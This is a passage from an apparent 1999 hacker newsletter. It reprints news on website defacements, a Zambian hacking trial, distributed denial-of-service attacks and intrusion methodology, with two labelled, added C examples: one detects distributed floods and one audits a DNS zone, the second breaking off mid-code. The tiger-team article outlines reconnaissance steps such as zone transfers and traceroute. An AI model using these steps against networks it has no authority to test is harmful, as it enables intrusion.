      http://www.attrition.org/mirror/attrition/1999/10/19/www.georgewbush.com/screenshot.jpg
       
      Georgewbush.com 
      http://www.georgewbush.com/
      
      AP;
      
      Tuesday October 19 8:27 PM ET 

      Hackers Alter Bush Campaign Site

      By TED BRIDIS Associated Press Writer 

      WASHINGTON (AP) - Hackers vandalized the campaign Web site for 
      presidential candidate George W. Bush early Tuesday, briefly replacing 
      his photo with an image of a hammer and sickle and calling for ``a new 
      October revolution.''

      The embarrassing lapse in computer security came the day after the Bush 
      campaign launched what it described as its ``innovative new design'' for 
      its Internet site, www.georgewbush.com.

      ``We have taken steps to make sure this particular problem is fixed, and 
      we are looking at other ways to further secure the site,'' spokeswoman 
      Mindy Tucker said. The campaign was considering whether to formally 
      notify the authorities, such as the FBI, she said.

      Tucker said the campaign's more sensitive computer operations - such as 
      its e-mail system and contribution records - were protected on other 
      machines and weren't believed to have been compromised.

      The hackers replaced a news story about Bush on the Web site with a note 
      that ``the success or failure of the working class to achieve victory 
      depends upon a revolution (of) leadership.''

      The Web site runs software from Microsoft Corp. (Nasdaq: MSFT), 
      called Internet Information Server, that has suffered several serious 
      security problems during the past year. Microsoft has distributed patches 
      in each case but relies on local computer administrators to 
      install them correctly.

      A review of the Bush Internet site by The Associated Press showed 
      computer files plainly visible that experts recommend deleting for 
      security reasons. One file includes instructions for users to edit Web 
      pages on the site.

      ``It means to me there is no security policy for this site,'' said Russ 
      Cooper, a specialist who runs the popular NTBugtraq discussion group on 
      the Internet to expose security problems. ``It's typically unfortunate 
      that a lot of these people do not take the time to protect 
      themselves from this kind of embarrassment.''

      Another expert, Weld Pond, said there was ``no question'' that the Bush 
      campaign neglected to remove these remnants of computer code, which made 
      the site vulnerable.

      ``That's probably how they got in,'' said Pond, a consultant with L0pht 
      Heavy Industries of Boston. ``The fact that there are these sample files 
      on there is pretty problematic, meaning they didn't take much effort to 
      secure it.''

      Tucker said the campaign's own investigation found that the altered Web 
      page was accessible by the public for fewer than five minutes before a 
      backup system kicked in and restored the vandalized text with a fresh 
      copy.

      ``The image wasn't subtle,'' said Jeremy Pinnix, a director at a 
      Nashville, Tenn., design company who captured a snapshot of the 
      vandalized Web site. He said he notified the Bush campaign immediately, 
      but ``they didn't really seem too worried.''

      Before Vice President Al Gore's campaign acquired the Web address for its 
      Internet site, www.algore2000.com, a spokesman said the previous owner 
      published a blurred photo of Gore with the message: ``Should Al Gore 
      be president? It's a little unclear (get it?)''  
      
      Wired;
      
      George W. Bush the Red? by Declan McCullagh

      12:55 p.m. 19.Oct.99.PDT Intruders apparently defaced the official 
      campaign site of Republican presidential candidate George W. Bush early 
      Tuesday, replacing a photo of the Texas governor with a bright red hammer 
      and sickle. 

      Visitors said the modified Web site, which quoted socialist literature 
      and linked to the International Communist League, was visible around 9:15 
      a.m. EDT. 


      Campaign officials spent the morning trying to puzzle out exactly what 
      happened, a task made more difficult by the fact that the Web server 
      automatically copied over the hacked page with the original one. 

      "We're trying to find out whether we had a visitor. Indications are that 
      we had a visitor," said Greg Sedberry, georgewbush.com webmaster. 

      This isn't the first time a presidential contender has been embarrassed. 
      Vice President Al Gore's campaign site was hacked on 10 April. "Gore was 
      broken into in April. That's the only one I know of in the 2000 race," 
      said B.K. DeLong, curator of the defacement archive at attrition.org.

      On Monday, the campaign introduced a newly designed Web site, switching 
      from a single Unix server to multiple computers running Windows NT and 
      Microsoft's Web server. 

      "I inherited that Unix box when I came on board [in July]," Sedberry 
      said. "I took that box and said we need a more robust setup. It was 
      developed from scratch, and that's where the problems can arise."

      The campaign's NT machines are co-located at Austin-based Illuminati 
      Online, which says it hosts 2,000 customer Web sites. 

      "The George W. Bush machines are not under our control. They maintain 
      everything on those machines," said an Illuminati Online engineer. 

      Jeremy Pinnix, webmaster of Nashville-based Anderson Thomas Design, said 
      he noticed the hacked site early Tuesday. 

      "I called them [the campaign] right away. They asked me to do a screen 
      capture and to email it to them. I haven't heard back, but when I 
      refreshed, it had been fixed," he said. 

      "Our first battle plan is to figure out exactly what happened," said 
      campaign spokeswoman Mindy Tucker. "This is obviously a problem that 
      anyone who has a Web site faces." 

      Sedberry said the NT machines are load-balanced, and the master Web 
      server copies files every few minutes to the duplicate ones. 

      "We're going through the whole system saying, 'Are we sure we locked that 
      down?'" said campaign webmaster Sedberry. "We're finishing it up, 
      double-checking, triple-checking. And we'll see." 

      According to a screen snapshot, the hacked site quoted the International 
      Communist League's belief that "we must take the Marxist doctrine of 
      proletarian revolution out of the realm of theory and give it reality." 

      @HWA
      
27.0  Space Rogue, Editor of HNN, on ABC News Webcast Today 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

      From HNN http://www.hackernews.com/

      contributed by weld pond 
      Space Rogue from HNN will be interviewed today in a
      live webcast with Sam Donaldson. The subject is "Who
      hacks computers, and why?". Also appearing will be
      William Marlow, executive vice president of Global
      Integrity, a company that advises other companies on
      hackers/crackers. 

      Sam Donaldson Live! - The show will be archived for later viewing       
      http://www.abcnews.go.com/onair/DailyNews/SamDonaldson_Index.html
      
      @HWA
      
28.0  20% of Hosts in Singapore Vulnerable 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by lamer 
      When the local Singaporean newspaper, The Sunday
      Times, asked IT security firm Infinitum to check on the
      vulnerability of local systems they found that fully one
      fifth of .sg addresses were vulnerable to attack.
      Infinitum found 13,000 registered .sg addresses with
      almost 8,000 actually connected to the net. The scan
      revealed that of those 8,000 sites 1,833 were running
      with outdated or unpatched software leaving them
      vulnerable to cyber attack. 

      The Straits Times       
      http://web3.asia1.com.sg/archive/st/0/cyb/cyb1_1017.html
      
      OCT 17 1999 
 
      Many servers easy prey to hackers 
 
      A check by an IT security firm reveals nearly 25
      per cent of servers with .sg addresses are using
      flawed software with holes hackers can exploit
      easily
 
      By SAMANTHA SANTA MARIA
 
      MORE than a fifth of nearly 8,000 operational Internet
      servers here are using flawed software that would allow
      hackers to enter in under a minute. 
 
      The 1,833 servers hosting websites which have .sg in
      their addresses are either using old software riddled with
      holes hackers can exploit, or newer software in which
      the holes have not been "patched" with
      security-enhancing updates. 
 
      This is against a backdrop of 70 per cent of the servers
      here using one program or another which is known to
      have security flaws. 
 
      This is what local IT security firm Infinitum found in a
      check done for The Sunday Times. 
 
      The servers include those which host the websites of
      government departments, Internet service providers and
      educational institutions. 
 
      Security consultants said that it is alarming that more
      than a fifth of Singapore's Internet servers are insecure. 
 
      The situation suggests that the people running these
      systems do not know about the security lapses or do not
      know how to fix them. 
 
      They noted that users find faults in Internet server
      software all the time and the software vendors come up
      with remedies, or "patches". 
 
      But there is cause to worry if people looking after
      computer systems here are not spotting the flaws and
      patching them up as and when they are found. 
 
      Mr Tom Cervenka, a US-based network penetrator
      whose job is to test security, said most intrusion
      attempts could be thwarted by site managers who pay
      attention to security issues and update the protection for
      their sites regularly. 
 
      He said: "The problem seems to be a shortage of
      administrators who do this." 
 
      The problem is not exclusive to Singapore, said the
      consultants. 
 
      Security awareness is generally low worldwide. 
 
      A spokesman for an Israeli IT firm, Voltaire, said:
      "Systems administrators don't seem to have a firm grasp
      on security issues, no matter where they are." 
 
      The Sunday Times asked Infinitum to run the check after
      local websites were defaced, and several hackers cited
      the lack of security in Singapore websites as a reason
      for why they are targeted. 
 
      Infinitum's check showed that there are almost 13,000
      websites whose domain name ends with .sg, and of
      these, close to 8,000 are operational. 
 
      It used an easily available program to poll the .sg servers
      on what software was being used to publish their web
      pages. 
 
      The company then assessed the security of the software
      based on known vulnerabilities in the server software. 
 
      It found about 40 per cent of the servers use a freely
      distributed program by a non-profit organisation called
      Apache. 
 
      A Sunday Times check shows that the National
      University of Singapore, the Internal Revenue Authority
      of Singapore and Sony Music's local office are among
      them. 
 
      The second most popular software is Microsoft's
      Internet Information Server. This is used by almost 30
      per cent of the servers here. 
 
      It is understood that the Singapore Management
      University, People's Association and Harry's Bar are
      also among the software's users. 
     
      @HWA
      
      
29.0  Zambia's First Computer Crime Trial 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by Weld Pond 
      The Lusaka, Zambia government's State House web site
      was altered on July 7, 1999 and the intrusion was not
      noticed until 10 days later. Patrick Mkandawire has
      been charged and arrested for violating the country's
      Telecommunications Act. His lawyer has argued that
      that law does not apply to his client's crimes. The court
      has yet to make its final ruling in this case. 

      Africa News      
      http://library.northernlight.com/FD19991018120000062.html?cb=0&dx=1006&sc=0#doc
      
      Story Filed: Monday, October 18, 1999 8:12 PM EST 
      LUSAKA (Zambia) (African Eye News Service, October 17, 1999) - Zambia's 
      first computer hacker appeared in a packed Lusaka courtroom this week 
      after he allegedly cracked the government's State House website and 
      replaced President Frederick Chiluba's photo with an unflattering cartoon, 
      African Eye News Service (South Africa) reports. 

      Internet data processing manager Patrick Mkandawire allegedly hacked into 
      the government internet site on July 7 but it took officials ten full 
      days, until July 17, to notice he had replaced Chiluba's official portrait 
      with the "insulting" cartoon. 

      Mkandawire's attorney, Clement Michello, did not deny that his client had 
      hacked the site but insisted that Zambia did not yet have the laws to 
      prosecute anyone for computer hacking. 

      "The country simply doesn't have laws regulating mischief on the internet 
      and my client has therefore been irregularly charged," he said. 

      Mkandawire was charged and arrested for violating the country's 
      Telecommunications Act, which only regulated the activities of the 
      state-owned Zambia Telecommunications Company Limited (ZAMTEL). 

      It makes no direct reference to the Internet or websites. 

      Michello conceded that computer hacking was covered by the draft 1998 Law 
      Development Computer Bill but he stressed that the Bill was still being 
      finalised by the country's Law Development Commission and had not yet even 
      been tabled for debate in Parliament. 

      "How can anyone be charged under a non-existent law? This Bill will only 
      have authority once it has been approved and enacted," he said. 

      The draft Bill provides for the registration of computers and prohibits 
      unauthorised access, alterations or modification of data stored on 
      computers. 

      Warning that any attempt to prosecute Mkandawire using the Bill would be 
      unconstitutional, Michello demanded that all charges against Mkandawire be 
      quashed. 

      "My client should be released immediately," he said. 

      Prosecutor John Katongo rejected Mkandawire's defence, insisting that the 
      Telecommunications Act provided for the establishment of a Communications 
      Authority which was in turn responsible for licensing Internet Service 
      Providers (ISP). 

      The government website, and Chiluba's portrait, was hosted on one of these 
      service providers, Zamnet, and were therefore subject to the law, he said. 

      "Mkandawire has been charged for interfering in the telecommunications 
      service provided by Zamnet and we are therefore fully within our rights to 
      demand that he be punished," said Katongo. 

      The court will rule on Michello's objections to the charges next Monday. 

      Copyright 1999 African Eye News Service. Distributed via Africa News 
      Online. 

      @HWA

30.0  Russian Infowar Debunked 
      ~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by Omega 
      Is Russia on the verge of cyber attack as people in the
      FBI and the US Military would have you believe? Or is
      this more saber rattling to secure funding for their
      anti-cyber terrorism efforts? (Definitely a good read.
      Makes you think twice about those comments from
      Michael Vatis and Gen. Hamre.) 

      PBS                                
      http://www.pbs.org/cringely/pulpit/pulpit19991014.html
      
      I'm From the Government, Trust Me
      Why Russia Probably Isn't Invading
      U.S. Government web Sites and
      Even if They are, It Doesn't Matter 

      By Robert X. Cringely 

      Twenty years ago, I was working as an investigator for
      the Presidential Commission on the Accident at Three
      Mile Island. I was trying to help piece together what
      caused that nuclear power plant to almost go kablooey.
      The commission chairman was John Kemeny, inventor of the Basic
      programming language and then president of Dartmouth College. Back then, as
      now, nuclear safety was a hot news item, and the Commission was suffering
      from a news leak. So they called in the security consultants -- men in white belts
      and white shoes who seemed to be always chomping on unlit cigars. The
      consultants installed an elaborate system of monitors and guards meant to keep
      our secrets secret. When asked exactly who they were trying to keep from
      breaking-in to the building, the chief white shoe said, "Why the Washington
      Post, of course." 

      The Post, which had been breaking all those TMI stories, never had a budget
      for burglary. They never needed one. In the case of Three Mile Island, all it took
      was picking up a few bar tabs at some corner dive. But you could never
      convince the security consultants of this, since it would mean that their jobs
      couldn't be justified. And that's the moral of this story: Always consider the
      personal interests of people who say we are in danger and should pay them to
      do something to protect us. 

      What brought all of this back to mind after two decades was reading a number
      of news stories about supposed Russian infiltration of web sites in the U.S.
      government. To read these stories, it sounds pretty dire, like we are enduring a
      Russian cyber invasion. Those complaining seem to be the U.S. military and the
      FBI. 

      What a load of hogwash! Read the stories. What secrets have been lost? Well,
      none, but there has been lots of "sensitive data" transferred overseas. Sensitive
      data? What the heck does that mean? It means someone wants us to pay for
      something that doesn't require doing. 

      First let's deal with the difference between secrets and non-secrets. The U.S.
      government is absolutely mad for secrecy. It has hundreds of levels and types of
      secrecy, and has a tendency to declare as secret almost anything it considers to
      have value. Most U.S. secrets aren't worthy of being called secrets, yet they are.
      Is any of this "sensitive data" secret? Is it classified information? No. So the U.S.
      government has already decided that it doesn't really matter who reads this stuff.
      So why should we care, then, if some of the readers are from Russia? 

      U.S. rules say that if something is classified as secret, it can't be held on a
      computer that is reachable over the Internet. 

      So what we have lost apparently has little value, okay, but maybe what so
      worries our spooks is the volume of attacks from Russia or wherever. If that's
      the case, let's consider for a moment how search engines work. Excite, Alta
      Vista, Hotbot, Google, and all the rest use spider programs that go around the
      net, find web content, and drag it back to be indexed. All of these search
      engines -- dozens of them -- claim to be scouring the Internet on a daily basis.
      This means that they access every web server in Russia many times per day.
      Hey, doesn't that sound like an attack? Is Excite invading Russia? It also means
      they access every web server in the U.S. many times per day, including all the
      web servers holding that so-called "sensitive data." Is Alta Vista attacking U.S.
      security? 

      So maybe the Russian Academy of Sciences is developing a search engine. Do
      we have any idea whether it is accessing U.S. web sites that contain other than
      sensitive data? We don't know anything, because it is not in the interest of these
      alarmists to share with us that knowledge. 

      We make information available on the Internet -- a global network -- then raise
      an alarm when that information is actually accessed. What is wrong with this
      picture? 

      Of course, it is okay for us to do it, we are the good guys, remember? The CIA
      and the NSA visit every site they can on every server in every country including
      those we consider friendly. Is the CIA invading Australia? Regularly. 

      Somebody in the FBI or the U.S. military (or both) wants either to expand the
      definition of what is an official secret to include the hot lunch menu at your local
      elementary school, or they want more money for expanding their anti-cyber
      terrorism efforts. That is why these stories appear, not because there is any
      actual threat. This has to do with regulations or appropriations, but it doesn't
      have to do with real security. 

      Information that is declared to be for public consumption ought to be for public
      consumption anywhere. From a data security standpoint, such accesses are
      actually very good. They show us what is of interest to those we are afraid might
      become our enemies. And if those enemies actually DO find a nugget of real
      information in all that HTML, then they will have helped us make our systems
      better the next time. If there is a real data security story worth paying attention
      to, it's the IPv6 debate over whether every Internet packet should indicate the
      very PC upon which it originated. This is another weird situation where privacy
      proponents are up against those who advocate the protection of intellectual
      property. But I think the real situation is far different. Some of it is institutional
      paranoia, sure. But some of it is just busywork: The Internet Engineering Task
      Force decided 128 bits were needed for future Internet addresses, and they just
      couldn't bring themselves to allow any of those bits to go unused. We won't
      actually need 128 bits for decades, maybe centuries, but the idea of allowing
      some of them to just stay set at zero rankles engineers. So just for the heck of it,
      they decided to use 64 of those bits to designate the data source right down to
      the NIC address. 

      Is it stupid? Yes? Should it worry us? No. Our workaround to this point for the
      limitations of IP addressing has been to invent a variety of proxy and
      masquerading systems to allow a bunch of folks on a local area network to
      share a single IP address -- even if that address is dynamically assigned by a
      DHCP server at Earthlink. The same thing will happen with IPv6, though in
      reverse. Somebody will start a business to make all those individual IP
      addresses look like a single address. Problem solved. And you can bet it
      WON'T be solved by anyone with matching white belt and shoes. 
      
      @HWA
       
31.0  Distributed Coordinated Attacks 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by AlienPlague 
      A new style of DOS attacks, dubbed 'distributed
      coordinated attacks' may be the future of denial of
      service attacks. The new attack style, which has been
      seen a 'handful' of times over the past few weeks, is
      harder to detect and stop, mainly because, as the name
      implies, the attacks originate from more than one
      server. 

      ZD Net        
      http://www.zdnet.com/zdnn/stories/news/0,4586,2376768,00.html?chkpt=hpqsnewstest
      
      --------------------------------------------------------------
      This story was printed from ZDNN,
      located at http://www.zdnet.com/zdnn.
      --------------------------------------------------------------
      
      Cyber attacks -- both old and new
      By Robert Lemos, ZDNN
      October 19, 1999 3:53 PM PT
      URL: http://www.zdnet.com/zdnn/stories/news/0,4586,2376768,00.html
      
      ARLINGTON, Va. -- Over the past six weeks, U.S. network servers have come under assault
      by a fundamentally new style of computer attack, said experts here at the National Information
      Systems Security Conference.
      
      Known as "distributed coordinated attacks," this new style is particularly good at defeating
      present-day defenses against those intent on stopping Internet traffic to a particular company or
      Internet service -- a result known as denial of service. 
      
      "It's possible to detect the attack, but it is very hard to block it" using current software, said
      Thomas Longstaff, senior technical researcher for Software Engineering Institute at Carnegie
      Mellon University, during a panel presentation Tuesday. 
      
      A garden-variety denial-of-service attack uses a single server to attempt
      to tie up a network's connection, denying its users access to or from the
      Internet. Distributed coordinated attacks, however, use hundreds or
      thousands of servers co-opted by a malicious programmer to tag-team a single server. Because so
      many servers are used, each attack can be camouflaged as a legitimate connection attempt,
      making it difficult for the victim's intrusion software to identify that it is under attack and impossible
      to identify just who is attacking. 
      
      "Typically, you block the single network address that is attacking you," said Longstaff, whose
      group works with the Computer Emergency Response Team Coordination Center at Carnegie
      Mellon. CERT/CC tracks and responds to network attacks. "By spreading out the attack over a
      large number of addresses, it becomes much harder to deal with." 
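
      Longstaff's point about blocking a single address, as an added example
      in C (not part of the ZDNN story): a per-source threshold finds an
      address to block when one server floods, flags nothing when the same
      load is spread over 1000 sources, while an aggregate count still fires.
      The struct, function names, thresholds and sample traffic are
      constructed for this illustration.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>

/* One inbound connection attempt: arrival second and IPv4 source address. */
struct conn { uint32_t t; uint32_t src; };

static int cmp_u32(const void *a, const void *b)
{
    uint32_t x = *(const uint32_t *)a, y = *(const uint32_t *)b;
    return (x > y) - (x < y);
}

/* Sorted copy of the sources seen in [start, start + window); caller frees. */
static uint32_t *window_sources(const struct conn *c, size_t n, uint32_t start,
                                uint32_t window, size_t *m)
{
    uint32_t *s = malloc((n ? n : 1) * sizeof *s);
    *m = 0;
    if (s == NULL)
        return NULL;
    for (size_t k = 0; k < n; k++)
        if (c[k].t >= start && c[k].t - start < window)
            s[(*m)++] = c[k].src;
    qsort(s, *m, sizeof *s, cmp_u32);
    return s;
}

/* Per-address defence: number of sources that alone exceed per_src_limit
 * attempts in the window, i.e. the addresses a block list would catch. */
size_t blockable_sources(const struct conn *c, size_t n, uint32_t start,
                         uint32_t window, size_t per_src_limit)
{
    size_t m, flagged = 0, i = 0;
    uint32_t *s = window_sources(c, n, start, window, &m);
    if (s == NULL)
        return 0;
    while (i < m) {
        size_t j = i;
        while (j < m && s[j] == s[i])
            j++;
        if (j - i > per_src_limit)
            flagged++;
        i = j;
    }
    free(s);
    return flagged;
}

/* Aggregate detection: 1 when the total attempts in the window exceed
 * total_limit, whoever sent them; *distinct gets the source count. */
int aggregate_alarm(const struct conn *c, size_t n, uint32_t start,
                    uint32_t window, size_t total_limit, size_t *distinct)
{
    size_t m, d = 0;
    uint32_t *s = window_sources(c, n, start, window, &m);
    if (s == NULL)
        return 0;
    for (size_t i = 0; i < m; i++)
        if (i == 0 || s[i] != s[i - 1])
            d++;
    free(s);
    if (distinct != NULL)
        *distinct = d;
    return m > total_limit;
}

/* Constructed sample: `total` attempts over 10 seconds, spread round-robin
 * over `sources` addresses taken from the 198.18.0.0/15 benchmark range. */
void make_sample(struct conn *out, size_t total, size_t sources)
{
    for (size_t k = 0; k < total; k++) {
        out[k].t = (uint32_t)(k % 10);
        out[k].src = 0xC6120000u + (uint32_t)(k % sources);
    }
}

int main(void)
{
    enum { N = 2000 };
    static struct conn one[N], many[N];
    size_t d1 = 0, d2 = 0;

    make_sample(one, N, 1);       /* garden-variety: one source */
    make_sample(many, N, 1000);   /* distributed: 1000 sources  */
    int a1 = aggregate_alarm(one, N, 0, 10, 500, &d1);
    int a2 = aggregate_alarm(many, N, 0, 10, 500, &d2);
    printf("single source: alarm=%d sources=%zu blockable=%zu\n",
           a1, d1, blockable_sources(one, N, 0, 10, 50));
    printf("distributed:   alarm=%d sources=%zu blockable=%zu\n",
           a2, d2, blockable_sources(many, N, 0, 10, 50));
    return 0;
}
```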
      
      A 'handful' of attacks
      Longstaff and others have already locked horns with intruders using the distributed coordinated
      method of attack. In the past six weeks, a "handful of sites" have been attacked, taking them off
      the Internet for an unspecified amount of time, he said. He would not give any more details. 
      
      Getting the access necessary to compromise hundreds of servers is not as difficult as it sounds,
      said Barbara Fraser, consulting engineer to the CTO at Cisco Systems Inc. With "always on"
      connections to the home becoming more and more common, the number of insecure computers
      connected to the Internet full-time is increasing. "With the average home user knowing very little
      about security, this problem is going to get worse," she stressed. 
      
      In addition, hackers are more frequently automating the software used to gain access to systems
      through known exploits. A whole host of programs exist to scan networks connected to the
      Internet for previously discovered security holes that system administrators have not patched. 
      
      Attacks 'lowest common denominator'
      "This method attacks the lowest common denominator in security," said CERT's Longstaff. "It will
      never be hard to find a thousand servers that don't have the most up-to-date patches." In fact,
      prevention may rely more on protecting computers from being used by malicious programmers,
      rather than protecting the target, he said. 
      
      Stephen Cobb, vice president of research and education for InfoSec Labs Inc., stressed that
      network attackers, be they hackers or criminals bent on espionage or terrorism, have only
      temporarily thwarted the security software. "The security arena is a steady progression of more
      sophisticated attacks followed by better defenses," he said. "There is an evolution at work here." 
      
      The conference, put on by the National Institute of Standards and Technology, collects the United
      States' foremost professionals in network security. A glance through the attendee list shows that
      more than one attendee out of every 10 is an analyst for the computer-focused National Security
      Agency. 
      
      @HWA

32.0  Possible Network Intrusion Scenario 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by Q Bahl 
      This is a fairly decent article that outlines how an
      intruder might break into a mixed NT/Unix environment.
      It covers zone transfers, DMZ models, password
      sniffing/cracking, nmap, and other well-known tools and
      techniques. The author actually understands that one
      must have root before they can install back doors. 

      Network Computing                  
      http://www.networkcomputing.com/1021/1021ws1.html
      
      Anatomy of a Network Intrusion 

      October 18, 1999
      By Greg Shipley
      Empty Red Bull cans litter the floor, reflecting the warm glow of the 
      monitors. Alongside the sketch boards lie drained liters of Mountain Dew, 
      partially eaten burritos and dozens of 486 machines configured as Linux 
      Beowulf clusters. A Pentium II machine plugged into a seemingly endless line 
      of surge suppressors hums as it continues to brute-force password guesses at a 
      rate of 10 million per second. Only 12 more hours to go...

      All the machines have their lids off--no hard-core geek is ever satisfied 
      with the state of a system. Legal pads are covered with IP addresses, 
      penciled network maps and port numbers. As the attackers' scripts 
      relentlessly scan for the presence of the recently identified CGI 
      vulnerability, they continue to exchange notes with the crew on IRC 
      (Internet Relay Chat). They figure once they've compromised a few dozen 
      ISPs--creating a network of "stepping stones"--they can forge ahead to 
      their target.

      It's all about buffer space--a disposable safety net with a redo button. 
      If they "own" a dozen machines between them and their target, they can 
      attack with the confidence that only a cyborg in a time machine could ever 
      gather enough info to snag them--only a handful of organizations 
      have the manpower or expertise to catch intruders who leave no trail. 
      Attack, clean, reattack--and gain as much net space as possible.

      Auditor? Cracker? Strung-out administrator? The roles can be interchanged 
      and the distinction blurred, with one exception: The crackers have the 
      easiest task. They need find only one open doorway; the defenders must 
      check every lock.

      "It takes one to know one" may be cliché, but it holds up in the network 
      security arena. Understanding how attackers operate is invaluable--in 
      fact, it's your best defense. The concept of "hacking" into your own 
      network for security purposes isn't new. Dan Farmer published a 
      paper in 1995 entitled "Securing Your Site by Breaking Into It" 
      (www.fish.com/security/admin-guide-to-cracking.html). Network Computing 
      published a similar article a few years ago (see "Intrusion Detection 
      Provides a Pound of Prevention" at 
      www.networkcomputing.com/815/815ws1.html).

      Many of the time-tested security principles still hold true. However, 
      attackers' tools and talent have taken giant leaps. Each time security 
      products mature, so do attack methodologies, and if you fall behind on 
      either, you're setting yourself up for a nightmare.

      Cracking Some Myths
      Before we even think about sitting down in front 
      of a computer, let's debunk some common assumptions about crackers and 
      excuses for reduced vigilance.

      "We are not a high-profile company--no one is targeting us." You may 
      manufacture industrial-strength toilet seats, but be "next door," in 
      Internet terms, to an e-commerce site performing credit-card processing. 
      Or maybe you have great bandwidth or juicy servers, or maybe your 
      domain name just sounds cool. It often doesn't matter what your company 
      is or does; intruders can make use of your network even if it isn't their 
      final target.

      "That is a really complicated attack--it would never happen to us." 
      Although experts agree that the successful cracker lies somewhere between 
      script kiddy (able to execute prewritten code, but unable to manufacture 
      new exploit code) and elite programmer, most are able to pull off 
      fairly sophisticated attacks. Think back to your college years. Imagine 
      spending less time drinking beer and more time in front of your terminal. 
      What level of mischief could you
      achieve? Now add the declining prices of bandwidth and hardware and it's
      no wonder 14-year-olds are drawing visits from the Secret Service.
   
      @HWA                                                                                                                                                                                        
      
33.0  Intrusion Detection Provides A Pound Of Prevention 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
          

      By Mark Abene, Gerald L. Kovacich and Steven Lutz

      Attacks on systems and 
      networks have skyrocketed as rapidly changing technology, systems 
      integration, global networks, information warfare and hacker boredom have 
      become prevalent. Is your network next? Have you been hit already? 

      In the past, teams of friendly attackers, known as "Tiger Teams," would 
      test the security of systems and networks. Today, teams like this and 
      friendly attacks by both internal information systems security (InfoSec) 
      staff and consultancies have branched out. 

      We have put together such a venture. Our team attempts to penetrate a 
      system or an organization's network by taking on the role of attacker. 
      Using an external attack approach, the team typically performs 
      "zero-knowledge" attacks, meaning the team is given only the name of 
      the target organization. Sometimes the client provides the team with the 
      names or the types of systems or information management is most concerned 
      about. 

      Targets can include payroll and human resources departments, fund 
      transfers, proprietary data (such as product designs and source code) and 
      customer databases. The clients are varied: manufacturing, health care and       
      pharmaceuticals companies and major financial institutions. Here we 
      discuss our attack and intrusion-detection procedures and offer an 
      approach to intrusion prevention. 

      In addition, we present the methodology used to analyze individual system 
      security and show you how to strengthen intrusion detection using commonly 
      available tools. For more specific information concerning the attack       
      systems and tools used, see "Test Systems and Tools" and "Specific System 
      Attack," on Network Computing Online at 
      www.NetworkComputing.com/815/815ws1.html. 

      Playing the Hacker
      Our methodology of attack is similar to that of a 
      would-be attacker. It begins with exploring and mapping the target 
      organization's Internet connections. We start with whois queries to the 
      Internet Network Information Center (InterNIC) to determine domain 
      information, namely Domain Name System (DNS) servers. We attempt to map 
      the internal network topology using DNS queries. Typically, we request a 
      DNS zone transfer from the organization's authoritative name servers. 
      Although most commercial firewalls can block this type of probe, a 
      surprising number of organizations don't implement the block. 

      Next, using traceroute, we try to uncover possible candidates for a 
      firewall host or packet-filtering router, which would reveal itself as the 
      last hop before our probe packets begin to get dropped. We make a note of 
      this machine's address for reference. 

      With the DNS zone transfers as a guide, we attempt to find supposedly 
      untrusted machines, just outside the firewall. Most administrators are not 
      overly concerned with security on external machines because these are       
      considered sacrificial machines, relegated to a demilitarized zone. 
      However, these same administrators open their firewalls to permit any 
      type of network traffic coming from these sacrificial machines to connect 
      to machines behind the firewall--either as a convenience to themselves or 
      because of an oversight. 

      Another problem we see all too frequently is that the untrusted DNS 
      server, though outside the firewall, contains the organization's complete 
      DNS maps. Properly configured, it should contain maps only for those hosts 
      that the Internet-at-large needs to know about, such as the DNS 
      server, the external mail gateway, and possibly, the company's Web site. 
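
      An added example (not from the original article) of auditing an
      external zone for the problem just described: hosts beyond the DNS
      server, mail gateway and Web site, and internal addresses published to
      outsiders. It assumes simplified "name IN A address" zone text; the
      sample zone, host names and function names are constructed.

```c
#include <stdio.h>
#include <string.h>

struct zone_audit {
    size_t records;       /* A records parsed                   */
    size_t unexpected;    /* names not on the public allow list */
    size_t private_addr;  /* addresses in RFC 1918 space        */
};

/* 1 if a.b.x.x lies in 10/8, 172.16/12 or 192.168/16 (RFC 1918). */
static int is_rfc1918(unsigned a, unsigned b)
{
    return a == 10 || (a == 172 && b >= 16 && b <= 31) ||
           (a == 192 && b == 168);
}

static int on_list(const char *name, const char *const *list, size_t n)
{
    for (size_t i = 0; i < n; i++)
        if (strcmp(name, list[i]) == 0)
            return 1;
    return 0;
}

/* Walk the "name IN A a.b.c.d" lines of an external zone and count what an
 * outsider learns beyond the hosts in `pub`. Other record types, comments
 * and malformed lines are skipped. With verbose set, findings are printed. */
struct zone_audit audit_external_zone(const char *zone,
                                      const char *const *pub, size_t npub,
                                      int verbose)
{
    struct zone_audit r = {0, 0, 0};
    const char *p = zone;

    while (*p != '\0') {
        char line[160], name[64];
        unsigned a, b, c, d;
        size_t len = strcspn(p, "\n");
        size_t n = len < sizeof line - 1 ? len : sizeof line - 1;

        memcpy(line, p, n);
        line[n] = '\0';
        p += len + (p[len] == '\n');

        if (sscanf(line, "%63s IN A %u.%u.%u.%u", name, &a, &b, &c, &d) != 5)
            continue;
        if (a > 255 || b > 255 || c > 255 || d > 255)
            continue;
        r.records++;
        if (!on_list(name, pub, npub)) {
            r.unexpected++;
            if (verbose)
                printf("unexpected host in external zone: %s\n", name);
        }
        if (is_rfc1918(a, b)) {
            r.private_addr++;
            if (verbose)
                printf("internal address published: %s %u.%u.%u.%u\n",
                       name, a, b, c, d);
        }
    }
    return r;
}

/* Constructed external zone for a hypothetical example.com. */
const char SAMPLE_ZONE[] =
    "; external view, constructed sample\n"
    "@        IN MX 10 mail\n"
    "ns1      IN A  192.0.2.53\n"
    "mail     IN A  192.0.2.25\n"
    "www      IN A  192.0.2.80\n"
    "payroll  IN A  10.1.4.20\n"
    "hr-db    IN A  10.1.4.21\n"
    "build01  IN A  192.0.2.140\n";

/* Hosts the Internet at large needs: DNS server, mail gateway, Web site. */
const char *const PUBLIC_HOSTS[] = { "ns1", "mail", "www" };

int main(void)
{
    struct zone_audit r = audit_external_zone(SAMPLE_ZONE, PUBLIC_HOSTS, 3, 1);
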